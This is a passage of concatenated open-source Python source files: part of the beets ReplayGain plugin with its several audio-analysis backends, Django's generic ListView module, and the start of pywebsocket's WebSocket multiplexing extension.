for parts in results[0:num_lines]:
part = parts.split(b'\n')
if len(part) == 0:
self._log.debug('bad tool output: {0!r}', text)
raise ReplayGainError('bs1770gain failed')
try:
song = {
'file': part[0],
'gain': float((part[1].split('/'))[1].split('LU')[0]),
'peak': float(part[2].split('/')[1]),
}
except IndexError:
self._log.info('bs1770gain reports (faulty file?): {}', parts)
continue
out.append(Gain(song['gain'], song['peak']))
return out
# mpgain/aacgain CLI tool backend.
class CommandBackend(Backend):
def __init__(self, config, log):
super(CommandBackend, self).__init__(config, log)
config.add({
'command': u"",
'noclip': True,
})
self.command = config["command"].get(unicode)
if self.command:
# Explicit executable path.
if not os.path.isfile(self.command):
raise FatalReplayGainError(
'replaygain command does not exist: {0}'.format(
self.command
)
)
else:
# Check whether the program is in $PATH.
for cmd in (b'mp3gain', b'aacgain'):
try:
call([cmd, b'-v'])
self.command = cmd
except OSError:
pass
if not self.command:
raise FatalReplayGainError(
'no replaygain command found: install mp3gain or aacgain'
)
self.noclip = config['noclip'].get(bool)
target_level = config['targetlevel'].as_number()
self.gain_offset = int(target_level - 89)
def compute_track_gain(self, items):
"""Computes the track gain of the given tracks, returns a list
of TrackGain objects.
"""
supported_items = filter(self.format_supported, items)
output = self.compute_gain(supported_items, False)
return output
def compute_album_gain(self, album):
"""Computes the album gain of the given album, returns an
AlbumGain object.
"""
# TODO: What should be done when not all tracks in the album are
# supported?
supported_items = filter(self.format_supported, album.items())
if len(supported_items) != len(album.items()):
self._log.debug(u'tracks are of unsupported format')
return AlbumGain(None, [])
output = self.compute_gain(supported_items, True)
return AlbumGain(output[-1], output[:-1])
def format_supported(self, item):
"""Checks whether the given item is supported by the selected tool.
"""
if 'mp3gain' in self.command and item.format != 'MP3':
return False
elif 'aacgain' in self.command and item.format not in ('MP3', 'AAC'):
return False
return True
def compute_gain(self, items, is_album):
"""Computes the track or album gain of a list of items, returns
a list of TrackGain objects.
When computing album gain, the last TrackGain object returned is
the album gain
"""
if len(items) == 0:
self._log.debug('no supported tracks to analyze')
return []
"""Compute ReplayGain values and return a list of results
dictionaries as given by `parse_tool_output`.
"""
# Construct shell command. The "-o" option makes the output
# easily parseable (tab-delimited). "-s s" forces gain
# recalculation even if tags are already present and disables
# tag-writing; this turns the mp3gain/aacgain tool into a gain
# calculator rather than a tag manipulator because we take care
# of changing tags ourselves.
cmd = [self.command, b'-o', b'-s', b's']
if self.noclip:
# Adjust to avoid clipping.
cmd = cmd + [b'-k']
else:
# Disable clipping warning.
cmd = cmd + [b'-c']
cmd = cmd + [b'-d', bytes(self.gain_offset)]
cmd = cmd + [syspath(i.path) for i in items]
self._log.debug(u'analyzing {0} files', len(items))
self._log.debug(u"executing {0}", " ".join(map(displayable_path, cmd)))
output = call(cmd)
self._log.debug(u'analysis finished')
return self.parse_tool_output(output,
len(items) + (1 if is_album else 0))
def parse_tool_output(self, text, num_lines):
"""Given the tab-delimited output from an invocation of mp3gain
or aacgain, parse the text and return a list of dictionaries
containing information about each analyzed file.
"""
out = []
for line in text.split(b'\n')[1:num_lines + 1]:
parts = line.split(b'\t')
if len(parts) != 6 or parts[0] == b'File':
self._log.debug(u'bad tool output: {0}', text)
raise ReplayGainError('mp3gain failed')
d = {
'file': parts[0],
'mp3gain': int(parts[1]),
'gain': float(parts[2]),
'peak': float(parts[3]) / (1 << 15),
'maxgain': int(parts[4]),
'mingain': int(parts[5]),
}
out.append(Gain(d['gain'], d['peak']))
return out
# GStreamer-based backend.
class GStreamerBackend(Backend):
def __init__(self, config, log):
super(GStreamerBackend, self).__init__(config, log)
self._import_gst()
# Initialized a GStreamer pipeline of the form filesrc ->
# decodebin -> audioconvert -> audioresample -> rganalysis ->
# fakesink The connection between decodebin and audioconvert is
# handled dynamically after decodebin figures out the type of
# the input file.
self._src = self.Gst.ElementFactory.make("filesrc", "src")
self._decbin = self.Gst.ElementFactory.make("decodebin", "decbin")
self._conv = self.Gst.ElementFactory.make("audioconvert", "conv")
self._res = self.Gst.ElementFactory.make("audioresample", "res")
self._rg = self.Gst.ElementFactory.make("rganalysis", "rg")
if self._src is None or self._decbin is None or self._conv is None \
or self._res is None or self._rg is None:
raise FatalReplayGainError(
"Failed to load required GStreamer plugins"
)
# We check which files need gain ourselves, so all files given
# to rganalsys should have their gain computed, even if it
# already exists.
self._rg.set_property("forced", True)
self._rg.set_property("reference-level",
config["targetlevel"].as_number())
self._sink = self.Gst.ElementFactory.make("fakesink", "sink")
self._pipe = self.Gst.Pipeline()
self._pipe.add(self._src)
self._pipe.add(self._decbin)
self._pipe.add(self._conv)
self._pipe.add(self._res)
self._pipe.add(self._rg)
self._pipe.add(self._sink)
self._src.link(self._decbin)
self._conv.link(self._res)
self._res.link(self._rg)
self._rg.link(self._sink)
self._bus = self._pipe.get_bus()
self._bus.add_signal_watch()
self._bus.connect("message::eos", self._on_eos)
self._bus.connect("message::error", self._on_error)
self._bus.connect("message::tag", self._on_tag)
# Needed for handling the dynamic connection between decodebin
# and audioconvert
self._decbin.connect("pad-added", self._on_pad_added)
self._decbin.connect("pad-removed", self._on_pad_removed)
self._main_loop = self.GLib.MainLoop()
self._files = []
def _import_gst(self):
"""Import the necessary GObject-related modules and assign `Gst`
and `GObject` fields on this object.
"""
try:
import gi
except ImportError:
raise FatalReplayGainError(
"Failed to load GStreamer: python-gi not found"
)
try:
gi.require_version('Gst', '1.0')
except ValueError as e:
raise FatalReplayGainError(
"Failed to load GStreamer 1.0: {0}".format(e)
)
from gi.repository import GObject, Gst, GLib
# Calling GObject.threads_init() is not needed for
# PyGObject 3.10.2+
with warnings.catch_warnings():
warnings.simplefilter("ignore")
GObject.threads_init()
Gst.init([sys.argv[0]])
self.GObject = GObject
self.GLib = GLib
self.Gst = Gst
def compute(self, files, album):
self._error = None
self._files = list(files)
if len(self._files) == 0:
return
self._file_tags = collections.defaultdict(dict)
if album:
self._rg.set_property("num-tracks", len(self._files))
if self._set_first_file():
self._main_loop.run()
if self._error is not None:
raise self._error
def compute_track_gain(self, items):
self.compute(items, False)
if len(self._file_tags) != len(items):
raise ReplayGainError("Some tracks did not receive tags")
ret = []
for item in items:
ret.append(Gain(self._file_tags[item]["TRACK_GAIN"],
self._file_tags[item]["TRACK_PEAK"]))
return ret
def compute_album_gain(self, album):
items = list(album.items())
self.compute(items, True)
if len(self._file_tags) != len(items):
raise ReplayGainError("Some items in album did not receive tags")
ret = []
for item in items:
ret.append(Gain(self._file_tags[item]["TRACK_GAIN"],
self._file_tags[item]["TRACK_PEAK"]))
last_tags = self._file_tags[items[-1]]
return AlbumGain(Gain(last_tags["ALBUM_GAIN"],
last_tags["ALBUM_PEAK"]), ret)
def close(self):
self._bus.remove_signal_watch()
def _on_eos(self, bus, message):
# A file finished playing in all elements of the pipeline. The
# RG tags have already been propagated. If we don't have a next
# file, we stop processing.
if not self._set_next_file():
self._pipe.set_state(self.Gst.State.NULL)
self._main_loop.quit()
def _on_error(self, bus, message):
self._pipe.set_state(self.Gst.State.NULL)
self._main_loop.quit()
err, debug = message.parse_error()
f = self._src.get_property("location")
# A GStreamer error, either an unsupported format or a bug.
self._error = \
ReplayGainError(u"Error {0} - {1} on file {2}".format(err,
debug,
f))
def _on_tag(self, bus, message):
tags = message.parse_tag()
def handle_tag(taglist, tag, userdata):
# The rganalysis element provides both the existing tags for
# files and the new computes tags. In order to ensure we
# store the computed tags, we overwrite the RG values of
# received a second time.
if tag == self.Gst.TAG_TRACK_GAIN:
self._file_tags[self._file]["TRACK_GAIN"] = \
taglist.get_double(tag)[1]
elif tag == self.Gst.TAG_TRACK_PEAK:
self._file_tags[self._file]["TRACK_PEAK"] = \
taglist.get_double(tag)[1]
elif tag == self.Gst.TAG_ALBUM_GAIN:
self._file_tags[self._file]["ALBUM_GAIN"] = \
taglist.get_double(tag)[1]
elif tag == self.Gst.TAG_ALBUM_PEAK:
self._file_tags[self._file]["ALBUM_PEAK"] = \
taglist.get_double(tag)[1]
elif tag == self.Gst.TAG_REFERENCE_LEVEL:
self._file_tags[self._file]["REFERENCE_LEVEL"] = \
taglist.get_double(tag)[1]
tags.foreach(handle_tag, None)
def _set_first_file(self):
if len(self._files) == 0:
return False
self._file = self._files.pop(0)
self._pipe.set_state(self.Gst.State.NULL)
self._src.set_property("location", syspath(self._file.path))
self._pipe.set_state(self.Gst.State.PLAYING)
return True
def _set_file(self):
"""Initialize the filesrc element with the next file to be analyzed.
"""
# No more files, we're done
if len(self._files) == 0:
return False
self._file = self._files.pop(0)
# Disconnect the decodebin element from the pipeline, set its
# state to READY to to clear it.
self._decbin.unlink(self._conv)
self._decbin.set_state(self.Gst.State.READY)
# Set a new file on the filesrc element, can only be done in the
# READY state
self._src.set_state(self.Gst.State.READY)
self._src.set_property("location", syspath(self._file.path))
# Ensure the filesrc element received the paused state of the
# pipeline in a blocking manner
self._src.sync_state_with_parent()
self._src.get_state(self.Gst.CLOCK_TIME_NONE)
# Ensure the decodebin element receives the paused state of the
# pipeline in a blocking manner
self._decbin.sync_state_with_parent()
self._decbin.get_state(self.Gst.CLOCK_TIME_NONE)
return True
def _set_next_file(self):
"""Set the next file to be analyzed while keeping the pipeline
in the PAUSED state so that the rganalysis element can correctly
handle album gain.
"""
# A blocking pause
self._pipe.set_state(self.Gst.State.PAUSED)
self._pipe.get_state(self.Gst.CLOCK_TIME_NONE)
# Try setting the next file
ret = self._set_file()
if ret:
# Seek to the beginning in order to clear the EOS state of the
# various elements of the pipeline
self._pipe.seek_simple(self.Gst.Format.TIME,
self.Gst.SeekFlags.FLUSH,
0)
self._pipe.set_state(self.Gst.State.PLAYING)
return ret
def _on_pad_added(self, decbin, pad):
sink_pad = self._conv.get_compatible_pad(pad, None)
assert(sink_pad is not None)
pad.link(sink_pad)
def _on_pad_removed(self, decbin, pad):
# Called when the decodebin element is disconnected from the
# rest of the pipeline while switching input files
peer = pad.get_peer()
assert(peer is None)
class AudioToolsBackend(Backend):
"""ReplayGain backend that uses `Python Audio Tools
<http://audiotools.sourceforge.net/>`_ and its capabilities to read more
file formats and compute ReplayGain values using it replaygain module.
"""
def __init__(self, config, log):
super(AudioToolsBackend, self).__init__(config, log)
self._import_audiotools()
def _import_audiotools(self):
"""Check whether it's possible to import the necessary modules.
There is no check on the file formats at runtime.
:raises :exc:`ReplayGainError`: if the modules cannot be imported
"""
try:
import audiotools
import audiotools.replaygain
except ImportError:
raise FatalReplayGainError(
"Failed to load audiotools: audiotools not found"
)
self._mod_audiotools = audiotools
self._mod_replaygain = audiotools.replaygain
def open_audio_file(self, item):
"""Open the file to read the PCM stream from the using
``item.path``.
:return: the audiofile instance
:rtype: :class:`audiotools.AudioFile`
:raises :exc:`ReplayGainError`: if the file is not found or the
file format is not supported
"""
try:
audiofile = self._mod_audiotools.open(item.path)
except IOError:
raise ReplayGainError(
"File {} was not found".format(item.path)
)
except self._mod_audiotools.UnsupportedFile:
raise ReplayGainError(
"Unsupported file type {}".format(item.format)
)
return audiofile
def init_replaygain(self, audiofile, item):
"""Return an initialized :class:`audiotools.replaygain.ReplayGain`
instance, which requires the sample rate of the song(s) on which
the ReplayGain values will be computed. The item is passed in case
the sample rate is invalid to log the stored item sample rate.
:return: initialized replagain object
:rtype: :class:`audiotools.replaygain.ReplayGain`
:raises: :exc:`ReplayGainError` if the sample rate is invalid
"""
try:
rg = self._mod_replaygain.ReplayGain(audiofile.sample_rate())
except ValueError:
raise ReplayGainError(
"Unsupported sample rate {}".format(item.samplerate)
)
return
return rg
def compute_track_gain(self, items):
"""Compute ReplayGain values for the requested items.
:return list: list of :class:`Gain` objects
"""
return [self._compute_track_gain(item) for item in items]
def _title_gain(self, rg, audiofile):
"""Get the gain result pair from PyAudioTools using the `ReplayGain`
instance `rg` for the given `audiofile`.
Wraps `rg.title_gain(audiofile.to_pcm())` and throws a
`ReplayGainError` when the library fails.
"""
try:
# The method needs an audiotools.PCMReader instance that can
# be obtained from an audiofile instance.
return rg.title_gain(audiofile.to_pcm())
except ValueError as exc:
# `audiotools.replaygain` can raise a `ValueError` if the sample
# rate is incorrect.
self._log.debug('error in rg.title_gain() call: {}', exc)
raise ReplayGainError('audiotools audio data error')
def _compute_track_gain(self, item):
"""Compute ReplayGain value for the requested item.
:rtype: :class:`Gain`
"""
audiofile = self.open_audio_file(item)
rg = self.init_replaygain(audiofile, item)
# Each call to title_gain on a ReplayGain object returns peak and gain
# of the track.
rg_track_gain, rg_track_peak = rg._title_gain(rg, audiofile)
self._log.debug(u'ReplayGain for track {0} - {1}: {2:.2f}, {3:.2f}',
item.artist, item.title, rg_track_gain, rg_track_peak)
return Gain(gain=rg_track_gain, peak=rg_track_peak)
def compute_album_gain(self, album):
"""Compute ReplayGain values for the requested album and its items.
:rtype: :class:`AlbumGain`
"""
self._log.debug(u'Analysing album {0}', album)
# The first item is taken and opened to get the sample rate to
# initialize the replaygain object. The object is used for all the
# tracks in the album to get the album values.
item = list(album.items())[0]
audiofile = self.open_audio_file(item)
rg = self.init_replaygain(audiofile, item)
track_gains = []
for item in album.items():
audiofile = self.open_audio_file(item)
rg_track_gain, rg_track_peak = self._title_gain(rg, audiofile)
track_gains.append(
Gain(gain=rg_track_gain, peak=rg_track_peak)
)
self._log.debug(u'ReplayGain for track {0}: {1:.2f}, {2:.2f}',
item, rg_track_gain, rg_track_peak)
# After getting the values for all tracks, it's possible to get the
# album values.
rg_album_gain, rg_album_peak = rg.album_gain()
self._log.debug(u'ReplayGain for album {0}: {1:.2f}, {2:.2f}',
album, rg_album_gain, rg_album_peak)
return AlbumGain(
Gain(gain=rg_album_gain, peak=rg_album_peak),
track_gains=track_gains
)
# Main plugin logic.
class ReplayGainPlugin(BeetsPlugin):
"""Provides ReplayGain analysis.
"""
backends = {
"command": CommandBackend,
"gstreamer": GStreamerBackend,
"audiotools": AudioToolsBackend,
"bs1770gain": Bs1770gainBackend
}
def __init__(self):
super(ReplayGainPlugin, self).__init__()
# default backend is 'command' for backward-compatibility.
self.config.add({
'overwrite': False,
'auto': True,
'backend': u'command',
'targetlevel': 89,
})
self.overwrite = self.config['overwrite'].get(bool)
backend_name = self.config['backend'].get(unicode)
if backend_name not in self.backends:
raise ui.UserError(
u"Selected ReplayGain backend {0} is not supported. "
u"Please select one of: {1}".format(
backend_name,
u', '.join(self.backends.keys())
)
)
# On-import analysis.
if self.config['auto']:
self.import_stages = [self.imported]
try:
self.backend_instance = self.backends[backend_name](
self.config, self._log
)
except (ReplayGainError, FatalReplayGainError) as e:
raise ui.UserError(
'replaygain initialization failed: {0}'.format(e)
)
def track_requires_gain(self, item):
return self.overwrite or \
(not item.rg_track_gain or not item.rg_track_peak)
def album_requires_gain(self, album):
# Skip calculating gain only when *all* files don't need
# recalculation. This way, if any file among an album's tracks
# needs recalculation, we still get an accurate album gain
# value.
return self.overwrite or \
any([not item.rg_album_gain or not item.rg_album_peak
for item in album.items()])
def store_track_gain(self, item, track_gain):
item.rg_track_gain = track_gain.gain
item.rg_track_peak = track_gain.peak
item.store()
self._log.debug(u'applied track gain {0}, peak {1}',
item.rg_track_gain, item.rg_track_peak)
def store_album_gain(self, album, album_gain):
album.rg_album_gain = album_gain.gain
album.rg_album_peak = album_gain.peak
album.store()
self._log.debug(u'applied album gain {0}, peak {1}',
album.rg_album_gain, album.rg_album_peak)
def handle_album(self, album, write):
"""Compute album and track replay gain store it in all of the
album's items.
If ``write`` is truthy then ``item.write()`` is called for each
item. If replay gain information is already present in all
items, nothing is done.
"""
if not self.album_requires_gain(album):
self._log.info(u'Skipping album {0}', album)
return
self._log.info(u'analyzing {0}', album)
try:
album_gain = self.backend_instance.compute_album_gain(album)
if len(album_gain.track_gains) != len(album.items()):
raise ReplayGainError(
u"ReplayGain backend failed "
u"for some tracks in album {0}".format(album)
)
self.store_album_gain(album, album_gain.album_gain)
for item, track_gain in itertools.izip(album.items(),
album_gain.track_gains):
self.store_track_gain(item, track_gain)
if write:
item.try_write()
except ReplayGainError as e:
self._log.info(u"ReplayGain error: {0}", e)
except FatalReplayGainError as e:
raise ui.UserError(
u"Fatal replay gain error: {0}".format(e)
)
def handle_track(self, item, write):
"""Compute track replay gain and store it in the item.
If ``write`` is truthy then ``item.write()`` is called to write
the data to disk. If replay gain information is already present
in the item, nothing is done.
"""
if not self.track_requires_gain(item):
self._log.info(u'Skipping track {0}', item)
return
self._log.info(u'analyzing {0}', item)
try:
track_gains = self.backend_instance.compute_track_gain([item])
if len(track_gains) != 1:
raise ReplayGainError(
u"ReplayGain backend failed for track {0}".format(item)
)
self.store_track_gain(item, track_gains[0])
if write:
item.try_write()
except ReplayGainError as e:
self._log.info(u"ReplayGain error: {0}", e)
except FatalReplayGainError as e:
raise ui.UserError(
u"Fatal replay gain error: {0}".format(e)
)
def imported(self, session, task):
"""Add replay gain info to items or albums of ``task``.
"""
if task.is_album:
self.handle_album(task.album, False)
else:
self.handle_track(task.item, False)
def commands(self):
"""Return the "replaygain" ui subcommand.
"""
def func(lib, opts, args):
self._log.setLevel(logging.INFO)
write = ui.should_write()
if opts.album:
for album in lib.albums(ui.decargs(args)):
self.handle_album(album, write)
else:
for item in lib.items(ui.decargs(args)):
self.handle_track(item, write)
cmd = ui.Subcommand('replaygain', help='analyze for ReplayGain')
cmd.parser.add_album_option()
cmd.func = func
return [cmd]
| mit |
gladsonvm/haystackdemo | lib/python2.7/site-packages/django/views/generic/list.py | 82 | 5852 | from django.core.paginator import Paginator, InvalidPage
from django.core.exceptions import ImproperlyConfigured
from django.http import Http404
from django.utils.encoding import smart_str
from django.utils.translation import ugettext as _
from django.views.generic.base import TemplateResponseMixin, View
class MultipleObjectMixin(object):
allow_empty = True
queryset = None
model = None
paginate_by = None
context_object_name = None
paginator_class = Paginator
def get_queryset(self):
"""
Get the list of items for this view. This must be an interable, and may
be a queryset (in which qs-specific behavior will be enabled).
"""
if self.queryset is not None:
queryset = self.queryset
if hasattr(queryset, '_clone'):
queryset = queryset._clone()
elif self.model is not None:
queryset = self.model._default_manager.all()
else:
raise ImproperlyConfigured(u"'%s' must define 'queryset' or 'model'"
% self.__class__.__name__)
return queryset
def paginate_queryset(self, queryset, page_size):
"""
Paginate the queryset, if needed.
"""
paginator = self.get_paginator(queryset, page_size, allow_empty_first_page=self.get_allow_empty())
page = self.kwargs.get('page') or self.request.GET.get('page') or 1
try:
page_number = int(page)
except ValueError:
if page == 'last':
page_number = paginator.num_pages
else:
raise Http404(_(u"Page is not 'last', nor can it be converted to an int."))
try:
page = paginator.page(page_number)
return (paginator, page, page.object_list, page.has_other_pages())
except InvalidPage:
raise Http404(_(u'Invalid page (%(page_number)s)') % {
'page_number': page_number
})
def get_paginate_by(self, queryset):
"""
Get the number of items to paginate by, or ``None`` for no pagination.
"""
return self.paginate_by
def get_paginator(self, queryset, per_page, orphans=0, allow_empty_first_page=True):
"""
Return an instance of the paginator for this view.
"""
return self.paginator_class(queryset, per_page, orphans=orphans, allow_empty_first_page=allow_empty_first_page)
def get_allow_empty(self):
"""
Returns ``True`` if the view should display empty lists, and ``False``
if a 404 should be raised instead.
"""
return self.allow_empty
def get_context_object_name(self, object_list):
"""
Get the name of the item to be used in the context.
"""
if self.context_object_name:
return self.context_object_name
elif hasattr(object_list, 'model'):
return smart_str('%s_list' % object_list.model._meta.object_name.lower())
else:
return None
def get_context_data(self, **kwargs):
"""
Get the context for this view.
"""
queryset = kwargs.pop('object_list')
page_size = self.get_paginate_by(queryset)
context_object_name = self.get_context_object_name(queryset)
if page_size:
paginator, page, queryset, is_paginated = self.paginate_queryset(queryset, page_size)
context = {
'paginator': paginator,
'page_obj': page,
'is_paginated': is_paginated,
'object_list': queryset
}
else:
context = {
'paginator': None,
'page_obj': None,
'is_paginated': False,
'object_list': queryset
}
context.update(kwargs)
if context_object_name is not None:
context[context_object_name] = queryset
return context
class BaseListView(MultipleObjectMixin, View):
def get(self, request, *args, **kwargs):
self.object_list = self.get_queryset()
allow_empty = self.get_allow_empty()
if not allow_empty and len(self.object_list) == 0:
raise Http404(_(u"Empty list and '%(class_name)s.allow_empty' is False.")
% {'class_name': self.__class__.__name__})
context = self.get_context_data(object_list=self.object_list)
return self.render_to_response(context)
class MultipleObjectTemplateResponseMixin(TemplateResponseMixin):
template_name_suffix = '_list'
def get_template_names(self):
"""
Return a list of template names to be used for the request. Must return
a list. May not be called if get_template is overridden.
"""
try:
names = super(MultipleObjectTemplateResponseMixin, self).get_template_names()
except ImproperlyConfigured:
# If template_name isn't specified, it's not a problem --
# we just start with an empty list.
names = []
# If the list is a queryset, we'll invent a template name based on the
# app and model name. This name gets put at the end of the template
# name list so that user-supplied names override the automatically-
# generated ones.
if hasattr(self.object_list, 'model'):
opts = self.object_list.model._meta
names.append("%s/%s%s.html" % (opts.app_label, opts.object_name.lower(), self.template_name_suffix))
return names
class ListView(MultipleObjectTemplateResponseMixin, BaseListView):
"""
Render some list of objects, set by `self.model` or `self.queryset`.
`self.queryset` can actually be any iterable of items, not just a queryset.
"""
| mit |
hiei23/servo | tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/mux.py | 636 | 71218 | # Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This file provides classes and helper functions for multiplexing extension.
Specification:
http://tools.ietf.org/html/draft-ietf-hybi-websocket-multiplexing-06
"""
import collections
import copy
import email
import email.parser
import logging
import math
import struct
import threading
import traceback
from mod_pywebsocket import common
from mod_pywebsocket import handshake
from mod_pywebsocket import util
from mod_pywebsocket._stream_base import BadOperationException
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_base import InvalidFrameException
from mod_pywebsocket._stream_hybi import Frame
from mod_pywebsocket._stream_hybi import Stream
from mod_pywebsocket._stream_hybi import StreamOptions
from mod_pywebsocket._stream_hybi import create_binary_frame
from mod_pywebsocket._stream_hybi import create_closing_handshake_body
from mod_pywebsocket._stream_hybi import create_header
from mod_pywebsocket._stream_hybi import create_length_header
from mod_pywebsocket._stream_hybi import parse_frame
from mod_pywebsocket.handshake import hybi
_CONTROL_CHANNEL_ID = 0
_DEFAULT_CHANNEL_ID = 1
_MUX_OPCODE_ADD_CHANNEL_REQUEST = 0
_MUX_OPCODE_ADD_CHANNEL_RESPONSE = 1
_MUX_OPCODE_FLOW_CONTROL = 2
_MUX_OPCODE_DROP_CHANNEL = 3
_MUX_OPCODE_NEW_CHANNEL_SLOT = 4
_MAX_CHANNEL_ID = 2 ** 29 - 1
_INITIAL_NUMBER_OF_CHANNEL_SLOTS = 64
_INITIAL_QUOTA_FOR_CLIENT = 8 * 1024
_HANDSHAKE_ENCODING_IDENTITY = 0
_HANDSHAKE_ENCODING_DELTA = 1
# We need only these status code for now.
_HTTP_BAD_RESPONSE_MESSAGES = {
common.HTTP_STATUS_BAD_REQUEST: 'Bad Request',
}
# DropChannel reason code
# TODO(bashi): Define all reason code defined in -05 draft.
_DROP_CODE_NORMAL_CLOSURE = 1000
_DROP_CODE_INVALID_ENCAPSULATING_MESSAGE = 2001
_DROP_CODE_CHANNEL_ID_TRUNCATED = 2002
_DROP_CODE_ENCAPSULATED_FRAME_IS_TRUNCATED = 2003
_DROP_CODE_UNKNOWN_MUX_OPCODE = 2004
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK = 2005
_DROP_CODE_CHANNEL_ALREADY_EXISTS = 2006
_DROP_CODE_NEW_CHANNEL_SLOT_VIOLATION = 2007
_DROP_CODE_UNKNOWN_REQUEST_ENCODING = 2010
_DROP_CODE_SEND_QUOTA_VIOLATION = 3005
_DROP_CODE_SEND_QUOTA_OVERFLOW = 3006
_DROP_CODE_ACKNOWLEDGED = 3008
_DROP_CODE_BAD_FRAGMENTATION = 3009
class MuxUnexpectedException(Exception):
"""Exception in handling multiplexing extension."""
pass
# Temporary
class MuxNotImplementedException(Exception):
"""Raised when a flow enters unimplemented code path."""
pass
class LogicalConnectionClosedException(Exception):
"""Raised when logical connection is gracefully closed."""
pass
class PhysicalConnectionError(Exception):
"""Raised when there is a physical connection error."""
def __init__(self, drop_code, message=''):
super(PhysicalConnectionError, self).__init__(
'code=%d, message=%r' % (drop_code, message))
self.drop_code = drop_code
self.message = message
class LogicalChannelError(Exception):
"""Raised when there is a logical channel error."""
def __init__(self, channel_id, drop_code, message=''):
super(LogicalChannelError, self).__init__(
'channel_id=%d, code=%d, message=%r' % (
channel_id, drop_code, message))
self.channel_id = channel_id
self.drop_code = drop_code
self.message = message
def _encode_channel_id(channel_id):
if channel_id < 0:
raise ValueError('Channel id %d must not be negative' % channel_id)
if channel_id < 2 ** 7:
return chr(channel_id)
if channel_id < 2 ** 14:
return struct.pack('!H', 0x8000 + channel_id)
if channel_id < 2 ** 21:
first = chr(0xc0 + (channel_id >> 16))
return first + struct.pack('!H', channel_id & 0xffff)
if channel_id < 2 ** 29:
return struct.pack('!L', 0xe0000000 + channel_id)
raise ValueError('Channel id %d is too large' % channel_id)
def _encode_number(number):
return create_length_header(number, False)
def _create_add_channel_response(channel_id, encoded_handshake,
encoding=0, rejected=False):
if encoding != 0 and encoding != 1:
raise ValueError('Invalid encoding %d' % encoding)
first_byte = ((_MUX_OPCODE_ADD_CHANNEL_RESPONSE << 5) |
(rejected << 4) | encoding)
block = (chr(first_byte) +
_encode_channel_id(channel_id) +
_encode_number(len(encoded_handshake)) +
encoded_handshake)
return block
def _create_drop_channel(channel_id, code=None, message=''):
if len(message) > 0 and code is None:
raise ValueError('Code must be specified if message is specified')
first_byte = _MUX_OPCODE_DROP_CHANNEL << 5
block = chr(first_byte) + _encode_channel_id(channel_id)
if code is None:
block += _encode_number(0) # Reason size
else:
reason = struct.pack('!H', code) + message
reason_size = _encode_number(len(reason))
block += reason_size + reason
return block
def _create_flow_control(channel_id, replenished_quota):
first_byte = _MUX_OPCODE_FLOW_CONTROL << 5
block = (chr(first_byte) +
_encode_channel_id(channel_id) +
_encode_number(replenished_quota))
return block
def _create_new_channel_slot(slots, send_quota):
if slots < 0 or send_quota < 0:
raise ValueError('slots and send_quota must be non-negative.')
first_byte = _MUX_OPCODE_NEW_CHANNEL_SLOT << 5
block = (chr(first_byte) +
_encode_number(slots) +
_encode_number(send_quota))
return block
def _create_fallback_new_channel_slot():
first_byte = (_MUX_OPCODE_NEW_CHANNEL_SLOT << 5) | 1 # Set the F flag
block = (chr(first_byte) + _encode_number(0) + _encode_number(0))
return block
def _parse_request_text(request_text):
request_line, header_lines = request_text.split('\r\n', 1)
words = request_line.split(' ')
if len(words) != 3:
raise ValueError('Bad Request-Line syntax %r' % request_line)
[command, path, version] = words
if version != 'HTTP/1.1':
raise ValueError('Bad request version %r' % version)
# email.parser.Parser() parses RFC 2822 (RFC 822) style headers.
# RFC 6455 refers RFC 2616 for handshake parsing, and RFC 2616 refers
# RFC 822.
headers = email.parser.Parser().parsestr(header_lines)
return command, path, version, headers
class _ControlBlock(object):
"""A structure that holds parsing result of multiplexing control block.
Control block specific attributes will be added by _MuxFramePayloadParser.
(e.g. encoded_handshake will be added for AddChannelRequest and
AddChannelResponse)
"""
def __init__(self, opcode):
self.opcode = opcode
class _MuxFramePayloadParser(object):
"""A class that parses multiplexed frame payload."""
def __init__(self, payload):
self._data = payload
self._read_position = 0
self._logger = util.get_class_logger(self)
def read_channel_id(self):
"""Reads channel id.
Raises:
ValueError: when the payload doesn't contain
valid channel id.
"""
remaining_length = len(self._data) - self._read_position
pos = self._read_position
if remaining_length == 0:
raise ValueError('Invalid channel id format')
channel_id = ord(self._data[pos])
channel_id_length = 1
if channel_id & 0xe0 == 0xe0:
if remaining_length < 4:
raise ValueError('Invalid channel id format')
channel_id = struct.unpack('!L',
self._data[pos:pos+4])[0] & 0x1fffffff
channel_id_length = 4
elif channel_id & 0xc0 == 0xc0:
if remaining_length < 3:
raise ValueError('Invalid channel id format')
channel_id = (((channel_id & 0x1f) << 16) +
struct.unpack('!H', self._data[pos+1:pos+3])[0])
channel_id_length = 3
elif channel_id & 0x80 == 0x80:
if remaining_length < 2:
raise ValueError('Invalid channel id format')
channel_id = struct.unpack('!H',
self._data[pos:pos+2])[0] & 0x3fff
channel_id_length = 2
self._read_position += channel_id_length
return channel_id
def read_inner_frame(self):
"""Reads an inner frame.
Raises:
PhysicalConnectionError: when the inner frame is invalid.
"""
if len(self._data) == self._read_position:
